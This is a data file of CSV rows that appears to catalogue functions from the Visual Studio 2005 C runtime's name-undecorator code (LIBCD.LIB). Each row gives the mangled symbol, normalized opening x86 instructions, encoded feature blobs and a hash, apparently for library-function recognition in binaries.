+?getArgumentTypes@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R8,BYTE PTR DS:[R32]\nMOV BYTE PTR SS:[EBP+CONST],R8\nCMP BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",E+K140+LzAoAAAAAqVeI8EOSIcZ3MFwkT4vMCgAAAAAAAAAAXqODJy5F5LIAAAAAsEJae0+LzAoAAAAAPL18LE+LzAoAAAAAdzBcJDy9fCwnD3USJw91ErLB1UJeo4MnJw91Emb2lEdeo4MnZvaUR0+LzAoAAAAAJw91ErBCWnsnD3USQ5Ihxk+LzAoAAAAAXqODJ6lXiPAAAAAAssHVQk+LzAoAAAAA5m87yhPiteMnD3USLkXksk+LzAoAAAAA,[],8405eb843c532a633a96d67789ff3c883b701841,VS2005,LIBCD.LIB
+??YDName@@QAEAAV0@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",yFLlr58KjEuYt0lVLoz+dVspziEGJxHSnwqMSy6M/nWYu+bRWynOITF9NgAAAAAAmLvm0TF9NgAAAAAAmLdJVTF9NgAAAAAABicR0jF9NgAAAAAAMX02AAAAAAAAAAAA,[],99a832dd2a0161c266d2220488c7459db350d3ef,VS2005,LIBCD.LIB
+?isUDC@DName@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAAtRoLbpZz8F9+LQUKfi0FCpZz8F/0Ke4I9CnuCNUc1LYAAAAA,[],9ea0df4dd22897c3ea2825e9ed7f9f90b94cddf4,VS2005,LIBCD.LIB
+?getVbTableType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",iZxrWAAAAAAAAAAA,6HU9816jgycAAAAANhVBoV6jgycAAAAAj9SbbV6jgycAAAAAep/MVY/Um21BvoZR7AKoZVA0OLyzwao8XqODJ17WI20AAAAAUDQ4vF7WI20ZxDF4Vhy5ZjUWchOP1JttQb6GUVA0OLxH5yNRUDQ4vDUWchOP1JttGcQxeF7WI20AAAAApX9vhFA0OLxH5yNRj9SbbTUWchMAAAAAs8GqPFA0OLzvmyYJR+cjUVA0OLyP1JttXtYjbQAAAAAAAAAAj9SbbVA0OLz5QAqpNRZyE6V/b4QAAAAA75smCV6jgyd6n8xVUDQ4vI/Um22yrHRp+UAKqVA0OLxWHLlmsqx0aTYVQaHodT3z,1dd270b64edceb8b9115ec7c5c0d431828abe1df,VS2005,LIBCD.LIB
+?getDisplacement@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32",wRGZPgAAAAAAAAAA,Ae58iwAAAAAAAAAAsqx0aY/Um21F8BWG9GaGcI/Um20AAAAARfAVhk+LzAoAAAAAj9SbbcjjyjvBDajYLkXksk+LzAoAAAAARfAVhk+LzAoAAAAAyOPKO/AijlyyrHRpj9SbbS5F5LIssFVVT4vMCgAAAAAAAAAAj9SbbS5F5LKP1JttLkXksk+LzAoAAAAAj9SbbfAijlyyrHRp8CKOXAHufIsuReSyGpNHI4/Um21F8BWGj9SbbcjjyjuP1JttwQ2o2E+LzAoAAAAALLBVVfRmhnAAAAAA,3071b023b2bc5b8f77b4d1411489caca09c3327c,VS2005,LIBCD.LIB
+?getPointerType@UnDecorator@@CA?AVDName@@ABV2@0@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",xKjfxAAAAAAAAAAA,qwp/KJ8KjEt1xTlfdcU5X58KjEsAAAAAnwqMS3XFOV+QsFcLe/ISADp6iI4bvlicQ5Ihxk+LzAoAAAAAdcU5X8gpHsoAAAAAj9SbbXvyEgCP1JttnwqMS8gpHsp1xTlfdcU5X58KjEsAAAAAkLBXC3XFOV8AAAAAOnqIjk+LzAoAAAAAG75YnJ8KjEufCoxL79gQG6sKfyiP1JttnwqMS3XFOV+fCoxLT4vMCgAAAAAAAAAAj9SbbRu+WJx78hIAnwqMS0OSIcafCoxLdcU5X0OSIcYAAAAAnwqMS58KjEt1xTlfyCkeyk+LzAoAAAAA,619066f30c9b883d975417f2d16cb510037ed02f,VS2005,LIBCD.LIB
+??HDName@@QBE?AV0@ABV0@@Z,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",nwqMS3XFOV+NdgMOGyA1TAAAAAAAAAAAjXYDDhsgNUwAAAAABGBHC58KjEuNeqyKjXqsihsgNUwAAAAAdcU5XxsgNUwAAAAA,[],7703484038ec4cebcacec22c94dcf94497eb04d2,VS2005,LIBCD.LIB
+??HDName@@QBE?AV0@PAV0@@Z,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",ESVRXAAAAAAAAAAABGBHCxElUVyNeqyKjXqsihsgNUwAAAAAGyA1TAAAAAAAAAAA,[],24380bd797f6d95fbfdc17239d58d069008f1cef,VS2005,LIBCD.LIB
+?doNoIdentCharCheck@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nPOP EBP\nRETN",IFDWgQAAAAAAAAAA,[],05dbdf0d17f4d3622b7206f64d0bb6717c8a7090,VS2005,LIBCD.LIB
+?getPtrRefDataType@UnDecorator@@CA?AVDName@@ABV2@H@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",j9SbbY/Um21A67gRj9SbbZ4r97gy4F9fnIZROI/Um22P1Jtt79gQG6AG8q6chlE4oGugR0+LzAoAAAAAQOu4EfY+sS2ga6BHMuBfX0+LzAoAAAAAT4vMCgAAAAAAAAAAoAbyrk+LzAoAAAAAniv3uE+LzAoAAAAA9j6xLU+LzAoAAAAA,[],336db5858a8e18c4cfe76b960d42bf85e4d68c6c,VS2005,LIBCD.LIB
+?composeDeclaration@UnDecorator@@CA?AVDName@@ABV2@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",at7qY0+LzAoAAAAAUmd/BvjVnld5wg2GiXEm1osNFEwAAAAAiw0UTEOSIcZv1FrFiw0UTBROt0wka0/E9dHyR1JnfwYAAAAA2wdx77BhT9x5wg2GrQtBLYsNFEwAAAAA2wdx77BhT9x5wg2GfkZDdL3uFXVSZ38Gb9RaxU+LzAoAAAAAecINhosNFEwAAAAAUmjqWxix28Nxtfdxiw0UTNsHce/bB3HviXEm1osNFEwAAAAAFSWxAYsNFEwAAAAAecINhosNFEwAAAAAiw0UTNsHce9SXInaiw0UTFJo6ltSZ38GcbX3cTUWchMAAAAA2wdx783cS3V5wg2GUlyJ2lJnfwYAAAAAUmd/BvjVnld5wg2GsGFP3FJo6ltSZ38GUmd/BlJnfwa08bdI+n84U4sNFEwAAAAA4bl7ElJo6lvbB3Hv+NWeV1Jo6lvryNEbQ5Ihxk+LzAoAAAAAecINhosNFEwAAAAAsGFP3BROt0ytC0EttPG3SPXR8kdSZ38GaNFuLeG5exL6fzhTfkZDdFJnfwZSZ38GJGtPxH5GQ3QAAAAAT4vMCgAAAAAAAAAAFPIsKhROt0wka0/EzdxLdYsNFEwAAAAAiw0UTBROt0ytC0EtUmd/BhTyLCp5wg2GUmjqW6bI6vLAWWfqLTK8ZDWvoWFQNDi8iw0UTNsHce88z7Y9rQtBLX5GQ3QAAAAAwFln6lJo6lsAAAAAecINhosNFEwAAAAAecINhosNFEwAAAAAiw0UTFJo6ltSaOpbPM+2PdsHce8AAAAA2wdx7w2eyW95wg2GecINhosNFEwAAAAAUmjqW6bI6vLAWWfqFE63TCeZ1hjbB3HvPM+2PdsHce8AAAAAiw0UTNsHce/bB3HvecINhn5GQ3QAAAAAwFln6lJo6lsAAAAA2wdx70MYgkh5wg2Gpsjq8jUWchOchlE4iw0UTNsHce/bB3HvfkZDdCeZ1hjbB3HvsGFP3FJnfwZSZ38GFPIsKo0cdomtC0EtGLHbwzUWchMAAAAAecINhosNFEwAAAAAecINhn5GQ3QAAAAA2wdx7/jVnld5wg2GfkZDdCb5vrNSZ38GrQtBLX5GQ3QAAAAANRZyEzUWchMAAAAApsjq8i0yvGRSaOpbiw0UTFJnfwZSZ38Giw0UTI0cdomtC0Etve4VdRTyLCp5wg2GhSpPRYsNFExF8BWGecINhosNFEwAAAAAUmd/BvfP4A15wg2GfkZDdD2uORvbB3HvrQtBLX5GQ3QAAAAAFPIsKsqFPyN4VW15QxiCSIsNFEwAAAAAap2nUjUWchMAAAAAecINhosNFEwAAAAA2wdx71JnfwZSaOpbFE63TCb5vrNSZ38GjRx2iacjvWNSZ38GUmjqW8BZZ+pjuFrniw0UTIlxJtatC0EtFPIsKo0cdomtC0Et+n84U4sNFEwAAAAAecINhosNFEwAAAAAecINhosNFEwAAAAANRZyE1JnfwYAAAAAfkZDdKcjvWNSZ38Giw0UTDnpeO7bB3HvUmjqW1HMvQ8NZ91qPa45G1JnfwZ4VW15FPIsKhdrjYRBuuBwRfAVhk+LzAoAAAAA98/gDVJnfwZSXIna2wdx7/jVnld5wg2GDWfdalJnfwYAAAAAUmd/BhTyLCp5wg2GOH2ecJu9IGlP0ILBiXEm1osNFEwAAAAAecINhosNFEwAAAAAiw0UTKcsKD5q3upjecINhosNFEwAAAAAeFVteVJnfwaElK8LiXEm1osNFEwAAAAAiw0UTNsHce/bB3Hviw0UTFJnfwZSXInaQbrgcBdrjYQvNjTX2wdx783cS3V5wg2GUlyJ2lJnfwYAAAAAhJSvC0+LzAoAAAAAUcy9DxTyLCp5wg2G+NWeVyeZ1hg56XjuecINhosNFEwAAAAAFPIsKtsHce94VW15rQtBLX5GQ3QAAAAAiw0UTCeZ1hg56XjuecINhosNFEwAAAAAfkZDdD2uORvbB3HvXqODJ58KjEsAAAAApywoPj2uORvbB3HvUmd/BhTyLCp5wg2G68jRG6bI6vLAWWfqjRx2iVJnfwZSZ38Giw0UTNsHce94VW15wFln6p8KjEsAAAAAsGFP3OvI0RtSZ38GUmd/BhTyLCr6fzhTUmd/BtsHce9BuuBweFVtefXR8kfbB3Hv2wdx70MYgkh5wg2GQxiCSIsNFEwAAAAAiw0UTNsHce88z7Y9nwqMSzWvoWFQNDi8+n84U4sNFEwAAAAAQbrgcNsHce+ElK8LDZ7Jbz2uORvbB3HvecINhosNFEwAAAAAUmd/BhTyLCp5wg2G2wdx77BhT9x5wg2GF2uNhOG5exL6fzhTJ5nWGFJnfwYAAAAAUDQ4vDh9nnBSaOpb2wdx79sHce94VW15UmjqWzUWchOchlE4hJSvC0+LzAoAAAAAFPIsKo0cdomtC0EtecINhosNFEwAAAAA+n84U35GQ3QAAAAA5Ux3BuG5exL6fzhTUmjqWzh9nnCmxCUl2wdx70MYgkh5wg2GFPIsKlJnfwbbB3HvpyO9Y1JnfwZSZ38GQxiCSIsNFEwAAAAAecINhosNFEwAAAAAiw0UTI0cdomtC0EtUmd/BhUlsQF5wg2Giw0UTIlxJtatC0EtLzY01+VMdwYAAAAAiw0UTFJnfwbbB3Hviw0UTFJo6lvryNEbDZ7Jbz2uORvbB3HvJvm+s+G5exL6fzhTecINhn5GQ3QAAAAA2wdx79sHce94VW15Umd/BhTyLCr6fzhT2wdx7xTyLCqT80mSUmd/BhTyLCr6fzhTrQtBLYsNFEwAAAAAjRx2ib3uFXVSZ38GQxiCSIsNFEwAAAAAiw0UTKcjvWN4VW15iw0UTMqFPyN4VW15k/NJkosNFEwAAAAAnIZRODUWchNqnadSiw0UTBdrjYRBuuBwsGFP3KcjvWN4VW15zdxLdX5GQ3QAAAAAeFVteacjvWP10fJHeFVtecqFPyNo0W4tNa+hYZu9IGlP0ILBiXEm1osNFEwAAAAApsQlJTWvoWEAAAAAFSWxAX5GQ3QAAAAAex6cck+LzAoAAAAAiw0UTIlxJtatC0EteFVtedsHce9XCI0YFPIsKlJnfwb10fJHUmd/Bg2eyW95wg2G9dHyR6cjvWMAAAAArQtBLYsNFEwAAAAAT9CCwV6jgydXCI0YfkZDdFJnfwanI71jiw0UTIlxJtatC0EtecINhn5GQ3QAAAAAiw0UTFJnfwb10fJHpyO9Y6cjvWNSZ38GecINhn5GQ3QAAAAAY7ha516jgycAAAAAyoU/I+G5exL6fzhT9dHyR1JnfwYAAAAA+n84U35GQ3QAAAAAXqODJ1JnfwYAAAAAiw0UTNsHce/bB3HvUmd/BhUlsQH6fzhTiw0UTI0cdomtC0EtfkZDdL3uFXXObE+uDZ7Jb73uFXXObE+u2wdx7/jVnld5wg2G+n84U4sNFEwAAAAAUmd/BhTyLCp5wg2G+n84U4sNFEwAAAAAUmd/BuG5exL6fzhTUmjqWy0yvGRSaOpbecINhosNFEwAAAAA4bl7ElJo6lvbB3HvecINhosNFEwAAAAAUmd/BhUlsQH6fzhTVwiNGE+LzAoAAAAAzmxPrhix28NSaOpbOel47lJnfwYAAAAA2wdx77BhT9x5wg2GrQtBLYsNFEwAAAAA2wdx70MYgkh5wg2GfkZDdFJo6lvbB3Hv+NWeV9sHce9XekcJm70gaYOLJHVaZA4NecINhosNFEwAAAAAFPIsKtsHce9SZ38GeFVtedsHce97Hpxy2wdx7w2eyW95wg2Giw0UTNsHce9XekcJiw0UTFJnfwbbB3Hv+NWeV1Jo6ltSaOpbyk72vRTyLCr6fzhTfkZDdD2uORvbB3HvFSWxAYsNFEwAAAAAecINhosNFEwAAAAAV3pHCdsHce8AAAAA2wdx783cS3V5wg2GecINhosNFEwAAAAAiw0UTNsHce9SZ38GfkZDdFJo6lvbB3Hv2wdx70MYgkh5wg2G+NWeVznpeO7bB3HvQxiCSIsNFEwAAAAAecINhosNFEwAAAAAUmd/BvfP4A0bk6Ijiw0UTOEF4HQka0/E2wdx77BhT9x5wg2GUmjqW1HMvQ9SaOpb2wdx783cS3V5wg2GJGtPxIsNFEwAAAAAG5OiI4sNFEwAAAAAiw0UTIlxJtatC0EtecINhosNFEwAAAAAg4skdRTyLCr6fzhTzdxLdYsNFEwAAAAArQtBLYsNFEwAAAAAzdxLdYsNFEwAAAAA4QXgdEOSIcZv1FrFVwiNGE+LzAoAAAAAiw0UTOvI0RtSZ38GWmQODcpO9r0AAAAAiw0UTFJnfwb10fJH98/gDdsHce9SXIna,[],e593528d92e3362161d551656377fdc89698f280,VS2005,LIBCD.LIB
+?doTypeOnly@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nPOP EBP\nRETN",IFDWgQAAAAAAAAAA,[],593a098af7412ba6df3e719f4f80bbe1633b5a99,VS2005,LIBCD.LIB
+?isPtrRef@DName@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHR R32,CONST\nAND R32,CONST",5ClDFAAAAAAAAAAA,[],73f604e6ec211876118122f1506f993888f23ebb,VS2005,LIBCD.LIB
+??0DName@@QAE@PAVDNameNode@@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",yDBrLQAAAAAAAAAA,[],36d9c77fcce664722ee788aa1e8e425ab28743c0,VS2005,LIBCD.LIB
+?getScopedName@UnDecorator@@CA?AVDName@@XZ,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN",qSCPCXvyEgBGiv0ED0Wo817WI20AAAAARor9BHvyEgB78hIA9GaGcF7WI20AAAAAkDNJoAAAAAAAAAAAXtYjbQAAAAAAAAAAUDQ4vJAzSaAPRajzr3CL1LKsdGn0ZoZwsqx0aVA0OLwPRajze/ISAHvyEgCvcIvUe/ISALKsdGn0ZoZwD0Wo817WI20AAAAA,[],7f282ad63273ae58cd5dca7d96753fc738a1e96c,VS2005,LIBCD.LIB
+??0Block@HeapManager@@QAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP",H6ipKAAAAAAAAAAA,[],e3c02ba113eba35756ecb0206bced6fb6ce64b91,VS2005,LIBCD.LIB
+?getSignedDimension@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",xpuwYU+LzAoAAAAAotIwa0+LzAoAAAAALkXksk+LzAoAAAAAT4vMCgAAAAAAAAAAGpNHI4/Um20uReSyj9SbbcabsGGi0jBr,[],08607e1b89e8e2b72dc5c798cc2bf89775aa44b8,VS2005,LIBCD.LIB
+??0DName@@QAE@PAV0@@Z,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",GifUTBs3rCrezKjMGzesKkSL1RcAAAAAY2UOaaNgDRYaJ9RM9RLEAESL1RcAAAAARIvVFwAAAAAAAAAA3syozPUSxAAAAAAAo2ANFgAAAAAAAAAA,[],51f7b406728a02b00d2c9a99310ca447400de9a2,VS2005,LIBCD.LIB
+?getLexicalFrame@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",0vxHDAAAAAAAAAAA,j9SbbfAijlyyrHRpj9SbbcjjyjuP1JttLLBVVfRmhnAAAAAAj9SbbcjjyjvBDajYh1217U+LzAoAAAAAsqx0aY/Um21F8BWG9GaGcI/Um20AAAAAwQ2o2E+LzAoAAAAARfAVhk+LzAoAAAAARfAVhk+LzAoAAAAALkXksk+LzAoAAAAAyOPKO/AijlyyrHRpj9SbbS5F5LIssFVVT4vMCgAAAAAAAAAALkXksk+LzAoAAAAAj9SbbS5F5LKP1Jtt8CKOXIddte0uReSyGpNHI4/Um21F8BWG,983f17c8f33b79c231db57169bfb1e76b35ebd88,VS2005,LIBCD.LIB
+?status@DName@@QBE?AW4DNameStatus@@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHL R32,CONST\nSAR R32,CONST",5ClDFAAAAAAAAAAA,[],8735300df72d591d64bb0a35e2ee5d67730bd469,VS2005,LIBCD.LIB
+??YDName@@QAEAAV0@W4DNameStatus@@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",nIZROPMOF+WchlE4uZa2nIOuQ14AAAAAMX02AAAAAAAAAAAAnIZROBon1EzzDhfllnPwX4p3DJgAAAAAg65DXjF9NgBbKc4htRoLbvMOF+WchlE48w4X5TF9NgAAAAAAincMmLmWtpwujP51u+Bp616jgycAAAAAWynOITF9NgAAAAAA3syozIp3DJgAAAAAXqODJ4OuQ14AAAAALoz+dV6jgye74GnrGifUTJZz8F/ezKjM,[],54520fd394b2ffee8437ad3abbf70e5452db0493,VS2005,LIBCD.LIB
+?getReturnType@UnDecorator@@CA?AVDName@@PAV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",080hSqXteTC8Knr/T4vMCgAAAAAAAAAAvCp6/0+LzAoAAAAApe15ME+LzAoAAAAA,[],a739e2f406765836d11681a602bd516ccbe3d8c6,VS2005,LIBCD.LIB
+?getNumberOfDimensions@UnDecorator@@CAHXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",xJKmaE+LzAoAAAAAj9SbbcjjyjtiFyRNj9SbbcSSpmgssFVVZnkxNU+LzAoAAAAA9GaGcI/Um20AAAAAYhckTU+LzAoAAAAAyOPKOz9ojxJGiv0ELLBVVfRmhnAAAAAADczAAU+LzAoAAAAAj9SbbcjjyjuP1Jtte/ISAMSSpmiP1Jttj9SbbT9ojxJGiv0ExJKmaE+LzAoAAAAAMRtw1Y/Um21meTE1P2iPEkFF0BvEkqZoQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAARor9BHvyEgANzMAB,[],f79e994055fcc497f405cc2cda3bf4e1c9679fc2,VS2005,LIBCD.LIB
+??4DName@@QAEAAV0@PBD@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",sn02DwAAAAAAAAAA,ojkvFaQXY28AAAAAyFJf1z7KhtkAAAAA1RzUtgAAAAAAAAAAPsqG2aQXY28AAAAApBdjb9Uc1LbIUl/X,7ac5e5af88026f949229c43a1832c186d4510827,VS2005,LIBCD.LIB
+?getTypeEncoding@UnDecorator@@CAHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",ep/MVUaK/QR6n8xVgsp1LzUWchPbB3Hvj3nGiyGSufMAAAAAcVqUOiGSufMAAAAAHW7Rqk+LzAoAAAAArf9+kHqfzFWOuUU4ep/MVUaK/QQMdrVlUmd/Bo95xovQlwRvAfKa7HFalDoAAAAA2wdx75v6AQOPecaLNRZyE9Uc1LYAAAAAep/MVXqfzFWiKgdEj3nGi9TZ7ssAAAAADHa1ZXbbIJ62oJo9ep/MVXqfzFWOuUU4j3nGiyGSufMAAAAAoioHRB1u0arBm6Auac0GADUWchPbB3Hvm/oBA9sHce+chlE4cVqUOiGSufMAAAAAUmd/Bjge3YoB8prs1Nnuy9sHce+chlE4b5TYEoLKdS8tYSrgdtsgnk+LzAoAAAAA0JcEb3FalDoAAAAAjrlFOHqfzFVvlNgStqCaPQAAAAAAAAAAnIZROFJnfwachlE4wZugLgAAAAAAAAAARor9BOB4J1T0Ke4IOB7diiGSufMAAAAAnIZROFJnfwY1FnITLWEq4GnNBgAAAAAAHW7Rqk+LzAoAAAAAtqCaPQAAAAAAAAAANRZyEx1u0aoAAAAAcVqUOiGSufMAAAAA9CnuCNUc1LYAAAAA2wdx7495xouf8twUHW7Rqk+LzAoAAAAA4HgnVAAAAAAAAAAAn/LcFHFalDoAAAAA8EzCSHqfzFWt/36Q1RzUtgAAAAAAAAAAT4vMCgAAAAAAAAAAIZK58x1u0aq2oJo9,[],52fb3ec9b84ebb37ffbab5aef3358ae562200182,VS2005,LIBCD.LIB
+?getBasedType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",l7V4kZCwVwt1UyyAdVMsgFd6RwmchlE4zLypBl6jgycAAAAAnIZROMy8qQachlE4XqODJ1VrPMMAAAAALkXksk+LzAoAAAAAkLBXC1VrPMMAAAAAnIZROC5F5LJeo4MnT4vMCgAAAAAAAAAAXqODJ16jgycAAAAAV3pHCV6jgycAAAAAVWs8w0+LzAoAAAAA,[],bffa96a9ab0b30423c4a620c06a32a5cd0baa9a8,VS2005,LIBCD.LIB
+?setIsUDC@DName@@QAEXXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAxoGamQAAAAAAAAAAyFLlr0+LzArGgZqZ,[],78af7678dfd56d21fde19bb8b28187d22b99292c,VS2005,LIBCD.LIB
+?getEnumType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32",BWKxlE+LzAoAAAAAtqCaPQAAAAAAAAAAQ+yarS5F5LK2oJo9RHvSnwVisZRD7JqtLkXksk+LzAoAAAAAT4vMCgAAAAAAAAAA,[],5a9f78b10085747df70c23e6d1f4b708753f0eac,VS2005,LIBCD.LIB
+?getVfTableType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",XtYjbQAAAAAAAAAA75smCV6jgyd6n8xVNRZyE6V/b4QAAAAAUDQ4vI/Um22yrHRp+UAKqVA0OLxWHLlmsqx0aTYVQaHodT3z6HU9816jgycAAAAANhVBoV6jgycAAAAAj9SbbVA0OLz5QAqpj9SbbV6jgycAAAAAep/MVY/Um21BvoZR7AKoZVA0OLyzwao8XqODJ17WI20AAAAAUDQ4vF7WI20ZxDF4Qb6GUVA0OLxH5yNRUDQ4vDUWchOP1JttGcQxeF7WI20AAAAApX9vhFA0OLxH5yNRj9SbbTUWchMAAAAAs8GqPFA0OLzvmyYJR+cjUVA0OLyP1JttVhy5ZjUWchOP1Jtt,[],0468f3e7f225ca58e6f8141756b5b76d3cd11f3d,VS2005,LIBCD.LIB
+?getTemplateName@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",LTicO0XwFYb27yRvRfAVhk+LzAoAAAAApksSP3sehU7DX5UKGJ+6b0+LzAoAAAAAw1+VCk+LzAoAAAAA9u8kb0nUmuhF8BWGSdSa6Bifum+mSxI/ex6FTk+LzAoAAAAAT4vMCgAAAAAAAAAA,[],acd04d5ab3c5415a6000caad83aeef4ed8e0999d,VS2005,LIBCD.LIB
+?getVCallThunkType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R8,BYTE PTR DS:[R32]\nMOV BYTE PTR SS:[EBP+CONST],R8\nCMP BYTE PTR SS:[EBP+CONST],0\nJCC CONST",XqODJ2SQI1AAAAAAfINzPk+LzAoAAAAA5m87yi5F5LInD3UST4vMCgAAAAAAAAAALkXksk+LzAoAAAAAJw91EnyDcz5eo4MnZJAjUAAAAAAAAAAA,[],1a7a92fc75a5b88134f989afe523316ae67696b8,VS2005,LIBCD.LIB
